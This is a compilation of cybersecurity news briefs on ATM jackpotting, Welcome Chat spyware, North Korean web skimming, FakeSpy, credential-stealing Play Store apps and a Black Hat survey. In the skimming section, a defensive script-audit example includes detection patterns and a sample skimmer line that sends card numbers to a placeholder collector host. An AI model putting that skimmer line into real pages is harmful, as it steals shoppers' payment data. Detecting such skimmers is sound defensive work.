In a black box attack, the attacker tampers with the ATM's external casing to get access to a port, or makes a hole in the machine to reach internal wires and connectors. Once the attacker has access, the black box is connected to the ATM through a laptop, establishing a connection with the internal systems. The attacker then has control over the command options and uses them to make the ATM dispense cash.

These kinds of jackpotting attacks on ATMs have been happening for a decade. Jackpotting has been popular among criminal gangs because the method is cost-effective and profitable. Jackpotting attacks are more straightforward than cloning cards, ATM skimming and laundering money, which take a lot of time. Another reason for the popularity of black box attacks is that amateur hackers do not have to spend a lot of money to get a black box: one can purchase a device and launch an ATM attack without investing much time.

"In recent incidents, attackers focus on outdoor systems and are destroying parts of the fascia to gain physical access to the head compartment. Next, the USB cable between the CMD-V4 dispenser and the special electronics, or the cable between special electronics and the ATM PC, was unplugged. This cable is connected to the black box of the attacker to send illegitimate dispense commands," says Diebold Nixdorf on its website.

Welcome Chat App Harvesting User Data and Storing it in an Insecure Location


Welcome Chat, a messaging platform for Android, spies on its users and stores their data in an unsecured location that is accessible to the public. The app's authors claim that it is available on the Google Play store and market it as a secure platform for exchanging messages; neither claim is true.

The website of the malicious 'Welcome Chat' app advertises it as a secure communication solution for Android. However, security researchers from ESET found the app to be part of a malicious operation linked to a Windows Trojan called 'BadPatch', which was used by the Gaza Hackers group in a long-running cyber espionage campaign in the Middle East. While the origins of the website advertising the app are unknown, the domain was registered by the developers in October 2019. Interestingly, the app does not only function as spyware; it works perfectly well as a chat platform too.

After downloading the app, users need to allow installation from unknown sources, as the app is not installed via the official app store. Once Welcome Chat is launched, it asks for permission to access the user's contacts, files, SMS messages and location, and to record audio. Although the list of permissions is long enough to raise suspicion, users are accustomed to granting such permissions, especially to a messaging app.

As soon as the app has been granted all the permissions, it starts harvesting the victim's data, including phone call recordings, location details and SMS messages, and sends it to the cybercriminals behind the operation.

Giving insight into the app, Lukáš Štefanko, a researcher at ESET, said, “In addition to Welcome Chat being an espionage tool, its operators left the data harvested from their victims freely available on the internet. And the app was never available on the official Android app store.”

“We did our best to discover a clean version of this app, to make its developer aware of the vulnerability. But our best guess is that no such app exists. Naturally, we made no effort to reach out to the malicious actors behind the espionage operation,” added Štefanko.

Hackers Attack Online Stores Stealing Credit Card Data, Experts Allege North Korea


According to recent findings, European and American online stores have been hit by web skimming attacks. The hackers responsible are likely state-sponsored actors from North Korea. Research by cybersecurity experts at Sansec reveals that the web skimming attacks on online retail stores started in May 2019. The APT groups Lazarus and Hidden Cobra were responsible for the attacks, planting payment skimmers on the compromised sites.



According to the new research, the hackers have now stepped up their activity. They have widened their target set and attack online stores using a skimming script that steals customers' banking credentials during the checkout stage. The researchers from Sansec attribute the attacks to Hidden Cobra because the same patterns were used in the group's previous attacks.

What is a Magecart Attack?
It is a web skimming attack in which hackers steal users' banking credentials and credit card details. In this incident, Hidden Cobra, after gaining access, launched a large-scale attack on major online retail stores. Once the hackers have unauthorized access, they deploy malicious scripts on the websites' checkout pages. The skimmer then captures all the details the user types during the checkout stage and sends them to Hidden Cobra's servers. According to Sansec's data, of the millions of online stores, up to 100 are compromised on average every day.

"To monetize the skimming operations, HIDDEN COBRA developed a global exfiltration network. This network utilizes legitimate sites that were hijacked and repurposed to serve as disguises for criminal activity. The system is also used to funnel the stolen assets so that they can be sold on dark web markets. Sansec has identified a number of these exfiltration nodes, including a modeling agency from Milan, a vintage music store from Tehran, and a family-run book store from New Jersey," says the Sansec report. Experts have now linked various attacks since 2019 to Hidden Cobra, and say that the threat actors are very likely state-sponsored.
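A store operator can catch the pattern described above, an injected script on the checkout page that reads payment fields and posts them to an unrelated host, by auditing what scripts the page actually serves. The following is an added example and not Sansec's tooling; the page markup, the allowlisted host and the flagged hosts are constructed, and the inline snippet only illustrates the skimmer's shape and is never executed.

```javascript
// Added example (not Sansec's tooling): audit a checkout page's <script> elements
// against an allowlist of expected hosts, and flag inline scripts that both read
// payment fields and send data off the page.

// Collect every <script> element: external ones by src, inline ones by body.
function extractScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push(src ? { src: src[1] } : { inline: m[2] });
  }
  return scripts;
}

// Return findings; an empty array means nothing unexpected was seen.
function auditCheckoutPage(html, allowedHosts, pageOrigin = 'https://shop.example/') {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src !== undefined) {
      let host = null;
      try { host = new URL(s.src, pageOrigin).hostname; } catch (e) { /* unparseable src */ }
      if (host === null || !allowedHosts.includes(host)) {
        findings.push({ kind: 'unlisted-external-script', src: s.src });
      }
    } else {
      const readsCard = /\b(card_?number|cvv|cvc|expiry)\b/i.test(s.inline);
      const sendsOut = /\bsendBeacon\b|\bXMLHttpRequest\b|\bfetch\s*\(|\bnew\s+Image\b/.test(s.inline);
      if (readsCard && sendsOut) {
        findings.push({ kind: 'inline-form-capture', snippet: s.inline.trim().slice(0, 60) });
      }
    }
  }
  return findings;
}

// Constructed sample page: a first-party script, one from a host not on the
// allowlist, and an inline snippet shaped like a skimmer (it never runs here).
const SAMPLE_HTML = `<html><body>
<form id="checkout"><input name="card_number"><input name="cvv"></form>
<script src="/js/checkout.js"></script>
<script src="https://static.unlisted-host.example/x.js"></script>
<script>
  document.getElementById('checkout').addEventListener('submit', () => {
    const v = document.querySelector('[name=card_number]').value;
    navigator.sendBeacon('https://collector.example/c', v);
  });
</script>
</body></html>`;
```

Running `auditCheckoutPage(SAMPLE_HTML, ['shop.example'])` reports the unlisted host and the inline capture; pairing this with a Content Security Policy that restricts script sources turns the same allowlist into an enforced control.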

Android Malware, FakeSpy Spying on Users' Banking Information Acting as Postal Services


A new Android malware, FakeSpy, which can steal an individual's banking details, read contact lists, and collect application and account information along with other personal data, is spreading across the globe. Earlier, the malware targeted a limited set of regions; the new campaign propagates it using SMS phishing attacks.

The malware was originally discovered in 2017 while it was attacking users in Japan and South Korea; however, security researchers have now identified more potent variants attacking users in countries including the United States, Germany, France, Taiwan, the United Kingdom and China.

FakeSpy, labeled an information stealer, is evolving rapidly and is under active development, as seen in the weekly release of new variants with different capabilities and levels of evasion.

"The malware authors seem to be putting a lot of effort into improving this malware, bundling it with numerous new upgrades that make it more sophisticated, evasive, and well-equipped. These improvements render FakeSpy one of the most powerful information stealers on the market. We anticipate this malware to continue to evolve with additional new features; the only question now is when we will see the next wave," said security researchers at Cybereason.

The tailored attacks have been linked to a financially motivated Korean- or Chinese-speaking cybercriminal group known as 'Roaming Mantis', which has been involved in similar operations, according to research carried out by Cybereason.

FakeSpy operates with the aim of making financial gains from users' stolen credentials and banking information; the campaign includes sending postal-themed messages to the targeted user's contacts.

Giving insight into the attack, Assaf Dahan, senior director and head of threat research at Cybereason, told ZDNet, "We are under the impression that this attack is what we often refer to as "spray and pray." I don't believe they are aimed at a particular individual, but instead, the threat actors try their luck, casting a rather wide net, and waiting for someone to take a bite."

"We see new developments and features added to the code all the time, so my guess is that business is good for them," he further added.

Google Play Store Removes 25 Android Apps that Stole User Login Credentials


In a recent cybersecurity incident, Google removed 25 applications from its Google Play Store after they were found to be stealing users' Facebook credentials. According to Google, these applications had been downloaded around 2.35 million times before the Play Store took them down. All 25 applications were created by the same developer; even though they appeared to work differently and offer different features, they were all peas in a pod.


These apps posed as video editors, photo editors, wallpaper apps, file managers, mobile games and flashlight apps, says Evina, a France-based cybersecurity firm. When the firm learned of the incident, it reported it to Google, and precautionary measures were taken immediately to protect end users. The malware was also reverse-engineered so that no further damage could take place. The 25 apps had malware embedded in them that stole Facebook login credentials whenever the user launched the Facebook application.

Although the apps worked as advertised, they contained hidden malicious code. The code could identify the most recently launched app on the user's device. If it was Facebook, these apps would display a fake login page that looked identical to the real one in order to steal the user's login credentials. If the user entered their credentials, the app captured the data and sent it to a remote server. When Google learned of the issue after Evina's report in May, it verified the findings before taking down the apps. The Play Store removed these 25 apps earlier this month; some of them had been available for more than a year.

"When an application is launched on your phone, the malware queries the application name. If it is a Facebook application, the malware will launch a browser that loads Facebook at the same time. The browser is displayed in the foreground, which makes you think that the application launched it. When you enter your credentials into this browser, the malware executes javascript to retrieve them. The malware then sends your account information to a server," said Evina in a blog post.

Cyberattacks in the U.S. Hit an All-Time High due to Covid-19, Says Black Hat Report


Due to the coronavirus pandemic, cybersecurity experts anticipate a rise in cyberattacks and cybercrime, says a survey published by Black Hat earlier this week. Around 275 cybersecurity professionals (the respondents in the study) expressed concern about potential breaches of U.S. infrastructure and the IT industry. More than 90% of these experts believe that the coronavirus has caused a jump in cyber threats in the U.S., resulting in data leaks and privacy breaches. Around 24% believe the current danger is very severe and critical.


Among the cybersecurity threats, vulnerabilities in the remote access systems used for working from home top the list, accounting for 57% of the attacks, while phishing scams and spam attacks account for a hefty 51%. Around 85% of these experts expect a targeted cyberattack on U.S. infrastructure within the next two years; this figure went up from 69% in 2018 to 77% in 2019. Only around 15% of the respondents believe that the government and the private sector are ready to face such attacks, down from about 20% in 2019.

The majority of cybersecurity experts believe their firms will have to deal with the upcoming cybersecurity challenges themselves. More than half believe they currently lack the staff required to combat cyber threats, and the budget available to protect their organization's data from cyberattacks is also low. Besides the lack of resources to defend against cybercriminals, experts also say they lack proper technology: according to the survey results, only half of their technology tools could be termed effective.

"The survey results suggest that the world's top cybersecurity professionals are more concerned than ever about cybersecurity risk at the global, national, enterprise, and consumer levels. While cyber threats have been growing in volume and sophistication in recent years, most security professionals believe that the radical shift toward remote access creates unprecedented risk for sensitive data," says the 2020 Black Hat USA report.